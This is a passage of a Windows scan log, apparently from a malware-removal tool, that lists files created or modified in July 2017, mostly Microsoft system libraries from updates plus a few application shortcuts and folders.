2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-14 19:07 - 2017-07-14 19:07 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-07-12 19:41 - 2017-07-12 19:41 - 000002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 21:53 - 2017-08-01 12:32 - 000000000 ____D C:\Users\Public\Speedup Sessions
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
